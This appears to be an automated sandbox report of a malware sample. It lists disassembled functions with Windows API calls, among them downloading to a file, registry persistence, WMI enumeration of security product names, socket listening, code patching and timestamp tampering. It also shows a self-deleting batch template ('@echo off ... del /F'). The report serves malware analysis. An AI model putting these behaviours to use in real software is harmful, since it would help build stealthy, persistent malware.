Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C4B0C1, Relevance: 16.0, APIs: 9, Instructions: 103

APIs

GetCommandLineW.KERNEL32 ref: 00C4B0DB
CommandLineToArgvW.SHELL32 ref: 00C4B0E2
StrCmpNW.SHLWAPI(?,00C27F1C,00000002), ref: 00C4B108
LocalFree.KERNEL32 ref: 00C4B134

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00001000), ref: 00C4B171
memcpy.MSVCRT ref: 00C4B184

Part of subcall function 00C4F8BA: memcpy.MSVCRT ref: 00C4F8E7

UnmapViewOfFile.KERNEL32 ref: 00C4B1BD
CloseHandle.KERNEL32 ref: 00C4B1F9

Part of subcall function 00C4B562: memset.MSVCRT ref: 00C4B587
Part of subcall function 00C4B562: memcpy.MSVCRT ref: 00C4B5E7
Part of subcall function 00C4B562: memcpy.MSVCRT ref: 00C4B5FF
Part of subcall function 00C4B562: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 00C4B66A
Part of subcall function 00C4B562: memcpy.MSVCRT ref: 00C4B6A8

memcpy.MSVCRT ref: 00C4B1E0

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD9152, Relevance: 16.0, APIs: 9, Instructions: 98

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00FD9173

Part of subcall function 00FD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD69A8

CloseHandle.KERNEL32 ref: 00FD9198
SetLastError.KERNEL32(00000008,?,?,?,?,00FE0646,?,?,?,?), ref: 00FD91A0
WaitForSingleObject.KERNEL32(?,00000000), ref: 00FD91BD
InternetReadFile.WININET(?,?,00001000,?), ref: 00FD91DB
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00FD9210
FlushFileBuffers.KERNEL32 ref: 00FD9229

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

CloseHandle.KERNEL32 ref: 00FD923C
SetLastError.KERNEL32(00000000,?,?,00001000,?,?,?,?,00FE0646,?,?,?,?), ref: 00FD9257

Part of subcall function 00FCE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00FCE82F
Part of subcall function 00FCE826: DeleteFileW.KERNEL32(?), ref: 00FCE836

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C39152, Relevance: 16.0, APIs: 9, Instructions: 98

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00C39173

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

CloseHandle.KERNEL32 ref: 00C39198
SetLastError.KERNEL32(00000008,?,?,?,?,00C40646,?,?,?,?), ref: 00C391A0
WaitForSingleObject.KERNEL32(?,00000000), ref: 00C391BD
InternetReadFile.WININET(?,?,00001000,?), ref: 00C391DB
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C39210
FlushFileBuffers.KERNEL32 ref: 00C39229

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

CloseHandle.KERNEL32 ref: 00C3923C
SetLastError.KERNEL32(00000000,?,?,00001000,?,?,?,?,00C40646,?,?,?,?), ref: 00C39257

Part of subcall function 00C2E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00C2E82F
Part of subcall function 00C2E826: DeleteFileW.KERNEL32(?), ref: 00C2E836

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCB392, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 230

APIs

Part of subcall function 00FF0741: CoInitializeEx.OLE32(00000000,00000000), ref: 00FF074E

Part of subcall function 00FD9F57: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,?,00FCB41A,?), ref: 00FD9F69
Part of subcall function 00FD9F57: #2.OLEAUT32(00FCB41A,00000000,?,?,?,00FCB41A,?), ref: 00FD9F9D
Part of subcall function 00FD9F57: #6.OLEAUT32(?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00FCB41A,?), ref: 00FD9FD2
Part of subcall function 00FD9F57: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00FD9FF2

#2.OLEAUT32(WQL,?), ref: 00FCB480
#2.OLEAUT32(?,?), ref: 00FCB49C
#6.OLEAUT32(?,?,00000030,00000000,?), ref: 00FCB4CC
#9.OLEAUT32(?), ref: 00FCB53D

Part of subcall function 00FD9F2C: #6.OLEAUT32(?,00000000,00FCB574), ref: 00FD9F49
Part of subcall function 00FD9F2C: CoUninitialize.OLE32 ref: 00FF078C

memcpy.MSVCRT ref: 00FCB616
memcpy.MSVCRT ref: 00FCB628
memcpy.MSVCRT ref: 00FCB63A

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Part of subcall function 00FD69B0: HeapAlloc.KERNEL32(00000008,?,?,00FD519B,?,?,?,?,00FE46A1,?,00FE49A5,?,?,00000001), ref: 00FD69C1

Strings

WQL, xrefs: 00FCB47B
displayName, xrefs: 00FCB50A

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2B392, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 230

APIs

Part of subcall function 00C50741: CoInitializeEx.OLE32(00000000,00000000), ref: 00C5074E

Part of subcall function 00C39F57: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,?,00C2B41A,?), ref: 00C39F69
Part of subcall function 00C39F57: #2.OLEAUT32(00C2B41A,00000000,?,?,?,00C2B41A,?), ref: 00C39F9D
Part of subcall function 00C39F57: #6.OLEAUT32(?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00C2B41A,?), ref: 00C39FD2
Part of subcall function 00C39F57: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00C39FF2

#2.OLEAUT32(WQL,?), ref: 00C2B480
#2.OLEAUT32(?,?), ref: 00C2B49C
#6.OLEAUT32(?,?,00000030,00000000,?), ref: 00C2B4CC
#9.OLEAUT32(?), ref: 00C2B53D

Part of subcall function 00C39F2C: #6.OLEAUT32(?,00000000,00C2B574), ref: 00C39F49
Part of subcall function 00C39F2C: CoUninitialize.OLE32 ref: 00C5078C

memcpy.MSVCRT ref: 00C2B616
memcpy.MSVCRT ref: 00C2B628
memcpy.MSVCRT ref: 00C2B63A

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

Strings

WQL, xrefs: 00C2B47B
displayName, xrefs: 00C2B50A

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FDE257, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 160

APIs

Part of subcall function 00FD568C: TlsSetValue.KERNEL32(00000001,00FD638A), ref: 00FD5699

GetCurrentThread.KERNEL32 ref: 00FDE26F
SetThreadPriority.KERNEL32 ref: 00FDE276

Part of subcall function 00FEBEE3: CreateMutexW.KERNEL32(01002974,00000000,?), ref: 00FEBF05

Part of subcall function 00FC9F72: memcpy.MSVCRT ref: 00FC9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FDE2C0

Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE439E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI ref: 00FE43A8
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE43F1
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE441E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00FE4428

Part of subcall function 00FDE22A: PathFindFileNameW.SHLWAPI(?), ref: 00FDE22E
Part of subcall function 00FDE22A: PathRemoveExtensionW.SHLWAPI(?), ref: 00FDE242
Part of subcall function 00FDE22A: CharUpperW.USER32(?,?,?,00FDE32B), ref: 00FDE24C

PathQuoteSpacesW.SHLWAPI(?), ref: 00FDE333

Part of subcall function 00FE4B8D: WaitForSingleObject.KERNEL32(00000000,00FD63B6), ref: 00FE4B95

WaitForSingleObject.KERNEL32 ref: 00FDE374
StrCmpW.SHLWAPI(?,?), ref: 00FDE3CE

Part of subcall function 00FE0D74: RegCreateKeyExW.ADVAPI32(80000001,00000102,00000000,00000000,00000000,?,00000000,?,?), ref: 00FE0D9C

RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00FDE42F

Part of subcall function 00FE0D19: RegFlushKey.ADVAPI32 ref: 00FE0D29
Part of subcall function 00FE0D19: RegCloseKey.ADVAPI32 ref: 00FE0D31

WaitForSingleObject.KERNEL32 ref: 00FDE450

Part of subcall function 00FD2FB7: ReleaseMutex.KERNEL32 ref: 00FD2FBB
Part of subcall function 00FD2FB7: CloseHandle.KERNEL32 ref: 00FD2FC2

Part of subcall function 00FF046D: EnterCriticalSection.KERNEL32(010030F4,?,?,00FCE3BD,00000000,?,?,00000001), ref: 00FF047A
Part of subcall function 00FF046D: LeaveCriticalSection.KERNEL32(010030F4,?,?,00FCE3BD,00000000,?,?,00000001), ref: 00FF0488

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00FDE2E2

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3E257, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 160

APIs

Part of subcall function 00C3568C: TlsSetValue.KERNEL32(00000001,00C554A7), ref: 00C35699

GetCurrentThread.KERNEL32 ref: 00C3E26F
SetThreadPriority.KERNEL32 ref: 00C3E276

Part of subcall function 00C4BEE3: CreateMutexW.KERNEL32(00C62974,00000000,?), ref: 00C4BF05

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C3E2C0

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

Part of subcall function 00C3E22A: PathFindFileNameW.SHLWAPI(?), ref: 00C3E22E
Part of subcall function 00C3E22A: PathRemoveExtensionW.SHLWAPI(?), ref: 00C3E242
Part of subcall function 00C3E22A: CharUpperW.USER32(?,?,?,00C3E32B), ref: 00C3E24C

PathQuoteSpacesW.SHLWAPI(?), ref: 00C3E333

Part of subcall function 00C44B8D: WaitForSingleObject.KERNEL32(00000000,00C554CE), ref: 00C44B95

WaitForSingleObject.KERNEL32 ref: 00C3E374
StrCmpW.SHLWAPI(?,?), ref: 00C3E3CE

Part of subcall function 00C40D74: RegCreateKeyExW.ADVAPI32(80000001,00000102,00000000,00000000,00000000,?,00000000,?,?), ref: 00C40D9C

RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00C3E42F

Part of subcall function 00C40D19: RegFlushKey.ADVAPI32 ref: 00C40D29
Part of subcall function 00C40D19: RegCloseKey.ADVAPI32 ref: 00C40D31

WaitForSingleObject.KERNEL32 ref: 00C3E450

Part of subcall function 00C32FB7: ReleaseMutex.KERNEL32 ref: 00C32FBB
Part of subcall function 00C32FB7: CloseHandle.KERNEL32 ref: 00C32FC2

Part of subcall function 00C5046D: EnterCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C5047A
Part of subcall function 00C5046D: LeaveCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C50488

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00C3E2E2

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE4214, Relevance: 15.1, APIs: 5, Strings: 2, Instructions: 97

APIs

EnterCriticalSection.KERNEL32(01003510,?,01002DB4,00000000,00000006,?,00FEBBC2,01002DB4,?,?,00000000), ref: 00FE422E
LeaveCriticalSection.KERNEL32(01003510,?,01002DB4,00000000,00000006,?,00FEBBC2,01002DB4,?,?,00000000), ref: 00FE4261

Part of subcall function 00FDDEBB: GetModuleHandleW.KERNEL32(shell32.dll), ref: 00FDDEC9
Part of subcall function 00FDDEBB: GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 00FDDED5
Part of subcall function 00FDDEBB: SetLastError.KERNEL32(00000001,00FE42C8,01002954,?,01002DB4,00000000,00000006,?,00FEBBC2,01002DB4,?,?,00000000), ref: 00FDDEED

CoTaskMemFree.OLE32(00000000), ref: 00FE42F6
PathRemoveBackslashW.SHLWAPI(?), ref: 00FE4303
SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00FE431A

Strings

SHGetKnownFolderPath, xrefs: 00FE42B9
shell32.dll, xrefs: 00FE42BE

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FC869E, Relevance: 15.1, APIs: 10, Instructions: 53

APIs

VirtualProtect.KERNEL32(?,00FD37D4,00000000,?), ref: 00FD3756

Part of subcall function 00FD6B09: memcmp.MSVCRT ref: 00FD6B29

GetCurrentThread.KERNEL32 ref: 00FD36AC
GetThreadPriority.KERNEL32 ref: 00FD36B5
SetThreadPriority.KERNEL32(?,0000000F), ref: 00FD36C6
Sleep.KERNEL32(00000000), ref: 00FD36CA
memcpy.MSVCRT ref: 00FD36D9
FlushInstructionCache.KERNEL32(000000FF,00000000,00000034), ref: 00FD36EA
SetThreadPriority.KERNEL32 ref: 00FD36F2

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

GetTickCount.KERNEL32 ref: 00FD370D
GetTickCount.KERNEL32 ref: 00FD371A
Sleep.KERNEL32(00000000), ref: 00FD3727

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2869E, Relevance: 15.1, APIs: 10, Instructions: 53

APIs

VirtualProtect.KERNEL32(?,00C337D4,00000000,?), ref: 00C33756

Part of subcall function 00C36B09: memcmp.MSVCRT ref: 00C36B29

GetCurrentThread.KERNEL32 ref: 00C336AC
GetThreadPriority.KERNEL32 ref: 00C336B5
SetThreadPriority.KERNEL32(?,0000000F), ref: 00C336C6
Sleep.KERNEL32(00000000), ref: 00C336CA
memcpy.MSVCRT ref: 00C336D9
FlushInstructionCache.KERNEL32(000000FF,00000000,00000034), ref: 00C336EA
SetThreadPriority.KERNEL32 ref: 00C336F2

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

GetTickCount.KERNEL32 ref: 00C3370D
GetTickCount.KERNEL32 ref: 00C3371A
Sleep.KERNEL32(00000000), ref: 00C33727

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCBFFE, Relevance: 15.0, APIs: 8, Instructions: 324

APIs

Part of subcall function 00FE5C6B: memset.MSVCRT ref: 00FE5C7A
Part of subcall function 00FE5C6B: memcpy.MSVCRT ref: 00FE5CA1

Part of subcall function 00FF0741: CoInitializeEx.OLE32(00000000,00000000), ref: 00FF074E

getsockopt.WS2_32(?,0000FFFF,00001008,?,?), ref: 00FCC08A
GetHandleInformation.KERNEL32(?,?), ref: 00FCC09C

Part of subcall function 00FF2755: EnterCriticalSection.KERNEL32(01003510,?,00FF30AF,?,?,00000000), ref: 00FF2765
Part of subcall function 00FF2755: LeaveCriticalSection.KERNEL32(01003510,?,00000000), ref: 00FF278F

socket.WS2_32(?,00000001,00000006), ref: 00FCC0CF
socket.WS2_32(?,00000002,00000011), ref: 00FCC0E0
closesocket.WS2_32(00000002), ref: 00FCC0FF
closesocket.WS2_32 ref: 00FCC106

Part of subcall function 00FD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD69A8

memset.MSVCRT ref: 00FCC1C8

Part of subcall function 00FF2BF3: bind.WS2_32(?,00FF2CD1), ref: 00FF2C3A
Part of subcall function 00FF2BF3: listen.WS2_32(?,00000014), ref: 00FF2C4F
Part of subcall function 00FF2BF3: WSAGetLastError.WS2_32(00000000,?,00FF2CD1,?,?,?,?,00000000), ref: 00FF2C5D
Part of subcall function 00FF2BF3: WSASetLastError.WS2_32(?,?,00FF2CD1,?,?,?,?,00000000), ref: 00FF2C6D

Part of subcall function 00FF2C7A: memset.MSVCRT ref: 00FF2C90
Part of subcall function 00FF2C7A: WSAGetLastError.WS2_32(?,?,?,?,00000000), ref: 00FF2CD5

Part of subcall function 00FF2AB4: memset.MSVCRT ref: 00FF2AC9
Part of subcall function 00FF2AB4: getsockname.WS2_32(?,00FCC22C,?), ref: 00FF2ADC

Part of subcall function 00FCC3F3: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FCC404

memcpy.MSVCRT ref: 00FCC3C8

Part of subcall function 00FEBF3B: CoUninitialize.OLE32 ref: 00FF078C

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2BFFE, Relevance: 15.0, APIs: 8, Instructions: 324

APIs

Part of subcall function 00C45C6B: memset.MSVCRT ref: 00C45C7A
Part of subcall function 00C45C6B: memcpy.MSVCRT ref: 00C45CA1

Part of subcall function 00C50741: CoInitializeEx.OLE32(00000000,00000000), ref: 00C5074E

getsockopt.WS2_32(?,0000FFFF,00001008,?,?), ref: 00C2C08A
GetHandleInformation.KERNEL32(?,?), ref: 00C2C09C

Part of subcall function 00C52755: EnterCriticalSection.KERNEL32(00C63510,?,00C530AF,?,?,00000000), ref: 00C52765
Part of subcall function 00C52755: LeaveCriticalSection.KERNEL32(00C63510,?,00000000), ref: 00C5278F

socket.WS2_32(?,00000001,00000006), ref: 00C2C0CF
socket.WS2_32(?,00000002,00000011), ref: 00C2C0E0
closesocket.WS2_32(00000002), ref: 00C2C0FF
closesocket.WS2_32 ref: 00C2C106

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

memset.MSVCRT ref: 00C2C1C8

Part of subcall function 00C52BF3: bind.WS2_32(?,00C52CD1), ref: 00C52C3A
Part of subcall function 00C52BF3: listen.WS2_32(?,00000014), ref: 00C52C4F
Part of subcall function 00C52BF3: WSAGetLastError.WS2_32(00000000,?,00C52CD1,?,?,?,?,00000000), ref: 00C52C5D
Part of subcall function 00C52BF3: WSASetLastError.WS2_32(?,?,00C52CD1,?,?,?,?,00000000), ref: 00C52C6D

Part of subcall function 00C52C7A: memset.MSVCRT ref: 00C52C90
Part of subcall function 00C52C7A: WSAGetLastError.WS2_32(?,?,?,?,00000000), ref: 00C52CD5

Part of subcall function 00C52AB4: memset.MSVCRT ref: 00C52AC9
Part of subcall function 00C52AB4: getsockname.WS2_32(?,00C2C22C,?), ref: 00C52ADC

Part of subcall function 00C2C3F3: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C2C404

memcpy.MSVCRT ref: 00C2C3C8

Part of subcall function 00C4BF3B: CoUninitialize.OLE32 ref: 00C5078C

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF08D2, Relevance: 15.0, APIs: 8, Instructions: 103

APIs

getpeername.WS2_32(?,?,?), ref: 00FF0909
getsockname.WS2_32(?,?,?), ref: 00FF0926
memcpy.MSVCRT ref: 00FF0949
memcpy.MSVCRT ref: 00FF0956
memcpy.MSVCRT ref: 00FF0976
memcpy.MSVCRT ref: 00FF0983
memset.MSVCRT ref: 00FF0993
memcpy.MSVCRT ref: 00FF09E3

Part of subcall function 00FD6BFF: send.WS2_32(?,?,00000015,00000000), ref: 00FD6C07

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C508D2, Relevance: 15.0, APIs: 8, Instructions: 103

APIs

getpeername.WS2_32(?,?,?), ref: 00C50909
getsockname.WS2_32(?,?,?), ref: 00C50926
memcpy.MSVCRT ref: 00C50949
memcpy.MSVCRT ref: 00C50956
memcpy.MSVCRT ref: 00C50976
memcpy.MSVCRT ref: 00C50983
memset.MSVCRT ref: 00C50993
memcpy.MSVCRT ref: 00C509E3

Part of subcall function 00C36BFF: send.WS2_32(?,?,00000015,00000000), ref: 00C36C07

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE432D, Relevance: 14.8, APIs: 5, Instructions: 98

APIs

memcpy.MSVCRT ref: 00FE439E
PathRemoveBackslashW.SHLWAPI ref: 00FE43A8
memcpy.MSVCRT ref: 00FE43F1
memcpy.MSVCRT ref: 00FE441E
PathRemoveBackslashW.SHLWAPI(?), ref: 00FE4428

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C4432D, Relevance: 14.8, APIs: 5, Instructions: 98

APIs

memcpy.MSVCRT ref: 00C4439E
PathRemoveBackslashW.SHLWAPI ref: 00C443A8
memcpy.MSVCRT ref: 00C443F1
memcpy.MSVCRT ref: 00C4441E
PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD5BB5, Relevance: 14.8, APIs: 8, Instructions: 67

APIs

EnterCriticalSection.KERNEL32(0111201C,01112010,?,00000001,00FDE48F,00000000,00FDE1B7,00000000,?,00000000,?,00000001,?,00FE4E98,?,00000001), ref: 00FD5BBE
CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FD5BF7
DuplicateHandle.KERNEL32(000000FF,?,000000FF,00FDE48F,00000000,00000000,00000002), ref: 00FD5C16
GetLastError.KERNEL32(?,000000FF,00FDE48F,00000000,00000000,00000002,?,00000001,00FDE48F,00000000,00FDE1B7,00000000,?,00000000,?,00000001), ref: 00FD5C20
TerminateThread.KERNEL32 ref: 00FD5C28
CloseHandle.KERNEL32 ref: 00FD5C2F

Part of subcall function 00FD69C9: HeapAlloc.KERNEL32(00000000,?,?,00FF4E9D,00FC9851,?,?,00FF4FB1,?,?,?,?,?,?,?,?), ref: 00FD69F3
Part of subcall function 00FD69C9: HeapReAlloc.KERNEL32(00000000,?,?,?,00FF4E9D,00FC9851,?,?,00FF4FB1,?,?,?,?,?,?), ref: 00FD6A06

LeaveCriticalSection.KERNEL32(0111201C,?,00000001,00FDE48F,00000000,00FDE1B7,00000000,?,00000000,?,00000001,?,00FE4E98,?,00000001), ref: 00FD5C44
ResumeThread.KERNEL32 ref: 00FD5C5D

Part of subcall function 00FD6A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00FECB50,?,00000000,00000001,00000001,00FECB1A,?,00FD54E4,?,@echo off%sdel /F "%s",?,?), ref: 00FD6A43
Part of subcall function 00FD6A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00FECB50,?,00000000,00000001,00000001,00FECB1A,?,00FD54E4,?,@echo off%sdel /F "%s",?), ref: 00FD6A56

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C35BB5, Relevance: 14.8, APIs: 8, Instructions: 67

APIs

EnterCriticalSection.KERNEL32(0000000C,00000000,?,00000001,00C3E48F,00000000,00C3E1B7,00000000,?,00000000,?,00000001,?,00C44E98,?,00000001), ref: 00C35BBE
CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C35BF7
DuplicateHandle.KERNEL32(000000FF,?,000000FF,00C3E48F,00000000,00000000,00000002), ref: 00C35C16
GetLastError.KERNEL32(?,000000FF,00C3E48F,00000000,00000000,00000002,?,00000001,00C3E48F,00000000,00C3E1B7,00000000,?,00000000,?,00000001), ref: 00C35C20
TerminateThread.KERNEL32 ref: 00C35C28
CloseHandle.KERNEL32 ref: 00C35C2F

Part of subcall function 00C369C9: HeapAlloc.KERNEL32(00000000,?,?,00C54E9D,00C29851,?,?,00C54FB1,?,?,?,?,?,?,?,?), ref: 00C369F3
Part of subcall function 00C369C9: HeapReAlloc.KERNEL32(00000000,?,?,?,00C54E9D,00C29851,?,?,00C54FB1,?,?,?,?,?,?), ref: 00C36A06

LeaveCriticalSection.KERNEL32(0000000C,?,00000001,00C3E48F,00000000,00C3E1B7,00000000,?,00000000,?,00000001,?,00C44E98,?,00000001), ref: 00C35C44
ResumeThread.KERNEL32 ref: 00C35C5D

Part of subcall function 00C36A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?,?), ref: 00C36A43
Part of subcall function 00C36A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00C4CB50,?,00000000,00000001,00000001,00C4CB1A,?,00C354E4,?,@echo off%sdel /F "%s",?), ref: 00C36A56

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCE717, Relevance: 14.7, APIs: 5, Strings: 2, Instructions: 89

APIs

memcpy.MSVCRT ref: 00FCE775
memcpy.MSVCRT ref: 00FCE78A
memcpy.MSVCRT ref: 00FCE79F
memcpy.MSVCRT ref: 00FCE7AE

Part of subcall function 00FCE301: EnterCriticalSection.KERNEL32(01003510,?,00FCE5BF,?,00FCE617,?,?,?,?,C:\Documents and Settings\Administrator\Local Settings\Application Data,00000000,00000000,00000000,?,00000000), ref: 00FCE311
Part of subcall function 00FCE301: LeaveCriticalSection.KERNEL32(01003510,?,00000000,?,00000002,?,C:\Documents and Settings\Administrator\Local Settings\Application Data,C:\Documents and Settings\Administrator\Local Settings\Application Data,?,00FDBE0B,?,?,00000830), ref: 00FCE340

Part of subcall function 00FDDEBB: GetModuleHandleW.KERNEL32(shell32.dll), ref: 00FDDEC9
Part of subcall function 00FDDEBB: GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 00FDDED5
Part of subcall function 00FDDEBB: SetLastError.KERNEL32(00000001,00FE42C8,01002954,?,01002DB4,00000000,00000006,?,00FEBBC2,01002DB4,?,?,00000000), ref: 00FDDEED

SetFileTime.KERNEL32(?,?,?,?), ref: 00FCE813

Strings

SetFileInformationByHandle, xrefs: 00FCE7BD
kernel32.dll, xrefs: 00FCE7C2

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 0351D86B, Relevance: 14.5, APIs: 3, Strings: 4, Instructions: 148

APIs

GetModuleFileNameW.KERNEL32(00000000,0355A8D1,00000104), ref: 0351D907

Part of subcall function 0351EEC8: GetCurrentProcess.KERNEL32 ref: 0351EEDE
Part of subcall function 0351EEC8: TerminateProcess.KERNEL32 ref: 0351EEE5

Part of subcall function 0351F2F7: LoadLibraryW.KERNEL32(USER32.DLL), ref: 0351F332
Part of subcall function 0351F2F7: GetProcAddress.KERNEL32(?,MessageBoxW), ref: 0351F34E
Part of subcall function 0351F2F7: EncodePointer.KERNEL32(?,?,MessageBoxW), ref: 0351F35F
Part of subcall function 0351F2F7: GetProcAddress.KERNEL32(?,GetActiveWindow), ref: 0351F36C
Part of subcall function 0351F2F7: EncodePointer.KERNEL32(?,?,GetActiveWindow,?,?,MessageBoxW), ref: 0351F36F
Part of subcall function 0351F2F7: GetProcAddress.KERNEL32(?,GetLastActivePopup), ref: 0351F37C
Part of subcall function 0351F2F7: EncodePointer.KERNEL32(?,?,GetLastActivePopup,?,?,GetActiveWindow,?,?,MessageBoxW), ref: 0351F37F
Part of subcall function 0351F2F7: GetProcAddress.KERNEL32(?,GetUserObjectInformationW), ref: 0351F38C
Part of subcall function 0351F2F7: EncodePointer.KERNEL32(?,?,GetUserObjectInformationW,?,?,GetLastActivePopup,?,?,GetActiveWindow,?,?,MessageBoxW), ref: 0351F38F
Part of subcall function 0351F2F7: GetProcAddress.KERNEL32(?,GetProcessWindowStation), ref: 0351F3A0
